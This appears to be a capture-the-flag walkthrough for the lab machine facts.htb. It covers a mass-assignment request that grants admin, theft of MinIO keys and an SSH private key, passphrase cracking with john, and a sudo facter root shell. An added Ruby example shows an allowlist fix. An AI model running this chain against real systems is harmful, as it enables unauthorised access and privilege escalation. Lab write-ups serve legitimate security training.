Getting MinIO credentials
Go to http://facts.htb/admin/profile/edit

Click Change Password and intercept the request, then append this parameter to the end of the request body:
&password%5Brole%5D=admin
The request body should then look like this:
_method=patch&authenticity_token=nxxxxxxxxxxxxxxxxxxxxxppDf-G2Yxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx_yfHr5sdf6-adGzhw&password%5Bpassword%5D=xxxxxx&password%5Bpassword_confirmation%5D=xxxxasd&password%5Brole%5D=admin
Forward the request, then go to the Admin UI and refresh. You should now have full admin functionality.
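Why the extra parameter is accepted, and the server-side fix, as an added example (not code from this writeup or from the application itself). The field allowlist, the starting role "client" and the sample values are assumptions made for illustration.

```ruby
require "uri"

# Assumption: the password-change form legitimately carries only these fields.
ALLOWED_PASSWORD_KEYS = %w[password password_confirmation].freeze

# Parse an application/x-www-form-urlencoded body and collect the nested
# "group[key]=value" pairs for one group, e.g. password[role]=admin.
def nested_params(body, group)
  URI.decode_www_form(body).each_with_object({}) do |(name, value), out|
    m = /\A#{Regexp.escape(group)}\[([^\]]+)\]\z/.match(name)
    out[m[1]] = value if m
  end
end

# Weak pattern: every submitted key is applied to the user record, so a
# client-supplied "role" overwrites the stored one (mass assignment).
def update_unfiltered(user, body)
  user.merge(nested_params(body, "password"))
end

# Hardened pattern: only allowlisted keys are applied; anything else is
# returned separately so it can be logged or alerted on.
# (Password hashing is omitted; the hash stands in for a user record.)
def update_allowlisted(user, body)
  submitted = nested_params(body, "password")
  accepted = submitted.slice(*ALLOWED_PASSWORD_KEYS)
  rejected = submitted.keys - ALLOWED_PASSWORD_KEYS
  [user.merge(accepted), rejected]
end

# Constructed sample: same shape as the request above, placeholder values.
SAMPLE_BODY = "_method=patch&authenticity_token=TOKEN" \
  "&password%5Bpassword%5D=newpass&password%5Bpassword_confirmation%5D=newpass" \
  "&password%5Brole%5D=admin"

SAMPLE_USER = { "role" => "client" }.freeze # constructed starting role

if __FILE__ == $PROGRAM_NAME
  puts "unfiltered role:  #{update_unfiltered(SAMPLE_USER, SAMPLE_BODY)['role']}"
  updated, rejected = update_allowlisted(SAMPLE_USER, SAMPLE_BODY)
  puts "allowlisted role: #{updated['role']}"
  puts "rejected keys:    #{rejected.inspect}"
end
```

A non-empty rejected list on a profile or password endpoint is also a useful detection signal, since the legitimate form never sends those keys.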

After that, go to Settings -> General Site -> File System settings, where you should find the Secret Key and Access Key for MinIO. Take note of both.

Connect to MinIO and get the SSH key
Install the mc client if you haven't already: https://docs.min.io/enterprise/aistor-object-store/reference/cli/
After that, set an alias for the server:
mc alias set facts http://facts.htb:54321 <ACCESS_KEY> <SECRET_KEY>
Optionally, list the contents:
mc ls facts/
[2025-xxx xxxx -03] 0B internal/
[2025-xxx xxxx -03] 0B randomfacts/
Now we pull the SSH key from internal/.ssh/id_ed25519:
mc get facts/internal/.ssh/id_ed25519
After getting the file, we brute-force its passphrase with john:
ssh2john ./id_ed25519 > id.hash
john --wordlist=/usr/share/wordlist/rockyou.txt id.hash
john --show id.hash
And we get the passphrase: dragonballz
Now we need to find which user to log in as.

Now log in to the server with the new credentials:
chmod 600 ./id_ed25519
ssh trivia@facts.htb -i ./id_ed25519
Get the flag
Now you should be logged in as trivia.
Checking sudo -l, we see the user can run facter as any user without a password:
trivia@facts:~$ sudo -l
Matching Defaults entries for trivia on facts:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User trivia may run the following commands on facts:
(ALL) NOPASSWD: /usr/bin/facter
First we create a Ruby script under /tmp/piv:
mkdir /tmp/piv
echo 'exec "/bin/sh"' > /tmp/piv/a.rb
Then we point facter at that directory:
sudo /usr/bin/facter --custom-dir=/tmp/piv
After that, grab all the flags:
cat /root/root.txt
cat /home/william/flag.txt